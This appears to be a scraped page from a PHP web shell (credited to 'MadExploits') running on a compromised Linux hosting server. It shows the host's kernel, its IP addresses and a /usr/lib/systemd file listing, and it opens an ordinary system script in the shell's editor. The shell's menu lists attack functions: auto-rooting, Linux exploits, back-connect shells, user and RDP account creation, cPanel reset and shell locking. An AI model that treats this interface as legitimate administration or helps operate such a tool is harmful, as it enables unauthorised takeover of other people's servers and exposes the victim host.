Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.144.252.58
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
systemd /
[ HOME SHELL ]
Name
Size
Permission
Action
catalog
[ DIR ]
drwxr-xr-x
ntp-units.d
[ DIR ]
drwxr-xr-x
scripts
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
system-generators
[ DIR ]
drwxr-xr-x
system-preset
[ DIR ]
drwxr-xr-x
system-shutdown
[ DIR ]
drwxr-xr-x
system-sleep
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
user-generators
[ DIR ]
drwxr-xr-x
user-preset
[ DIR ]
drwxr-xr-x
import-pubring.gpg
9.33
KB
-rw-r--r--
rhel-autorelabel
2.31
KB
-rwxr-xr-x
rhel-configure
399
B
-rwxr-xr-x
rhel-dmesg
110
B
-rwxr-xr-x
rhel-domainname
158
B
-rwxr-xr-x
rhel-import-state
1.03
KB
-rwxr-xr-x
rhel-loadmodules
233
B
-rwxr-xr-x
rhel-readonly
5.77
KB
-rwxr-xr-x
systemd
1.56
MB
-rwxr-xr-x
systemd-ac-power
23.41
KB
-rwxr-xr-x
systemd-activate
68.52
KB
-rwxr-xr-x
systemd-backlight
73.02
KB
-rwxr-xr-x
systemd-binfmt
60.73
KB
-rwxr-xr-x
systemd-bootchart
125.05
KB
-rwxr-xr-x
systemd-cgroups-agent
35.91
KB
-rwxr-xr-x
systemd-coredump
129.86
KB
-rwxr-xr-x
systemd-cryptsetup
101.28
KB
-rwxr-xr-x
systemd-fsck
331.23
KB
-rwxr-xr-x
systemd-hibernate-resume
39.95
KB
-rwxr-xr-x
systemd-hostnamed
367.16
KB
-rwxr-xr-x
systemd-importd
367.75
KB
-rwxr-xr-x
systemd-initctl
309.84
KB
-rwxr-xr-x
systemd-journald
338.05
KB
-rwxr-xr-x
systemd-localed
375.22
KB
-rwxr-xr-x
systemd-logind
624.84
KB
-rwxr-xr-x
systemd-machine-id-commit
52.19
KB
-rwxr-xr-x
systemd-machined
482.01
KB
-rwxr-xr-x
systemd-modules-load
64.8
KB
-rwxr-xr-x
systemd-pull
183.14
KB
-rwxr-xr-x
systemd-quotacheck
43.96
KB
-rwxr-xr-x
systemd-random-seed
48.13
KB
-rwxr-xr-x
systemd-readahead
97.51
KB
-rwxr-xr-x
systemd-remount-fs
56.52
KB
-rwxr-xr-x
systemd-reply-password
35.93
KB
-rwxr-xr-x
systemd-rfkill
60.74
KB
-rwxr-xr-x
systemd-shutdown
146.76
KB
-rwxr-xr-x
systemd-shutdownd
64.52
KB
-rwxr-xr-x
systemd-sleep
89.16
KB
-rwxr-xr-x
systemd-socket-proxyd
105.52
KB
-rwxr-xr-x
systemd-sysctl
64.83
KB
-rwxr-xr-x
systemd-sysv-install
40.22
KB
-rwxr-xr-x
systemd-timedated
375.91
KB
-rwxr-xr-x
systemd-udevd
406.45
KB
-rwxr-xr-x
systemd-update-done
44.07
KB
-rwxr-xr-x
systemd-update-utmp
309.87
KB
-rwxr-xr-x
systemd-user-sessions
44.16
KB
-rwxr-xr-x
systemd-vconsole-setup
52.2
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rhel-import-state
#!/bin/bash # rhel-import-state: import state files from initramfs (e.g. network config) # Copy state into root folder: # ============================ cd /run/initramfs/state IFS_backup=$IFS IFS=$'\n' # Process find's results line by line dirs_found=$(find . -type d) for dir in $dirs_found; do pushd "$dir" > /dev/null # Remove initial '.' char from the find's result: dest_dir="${dir/\./}" # Create destination folder if it does not exist (with the same rights): if [[ -n "$dest_dir" && ! -d "$dest_dir" ]]; then mkdir -p "$dest_dir" chmod --reference="$PWD" "$dest_dir" chown --reference="$PWD" "$dest_dir" fi # Copy all files that are not directory: find . -mindepth 1 -maxdepth 1 -not -type d -exec cp -av -t "$dest_dir" {} \; > /dev/null popd > /dev/null done IFS=$IFS_backup # Run restorecon on the copied files: # =================================== if [ -e /sys/fs/selinux/enforce -a -x /usr/sbin/restorecon ]; then find . -mindepth 1 -print0 | { cd / && xargs --null restorecon -iF; } fi
Close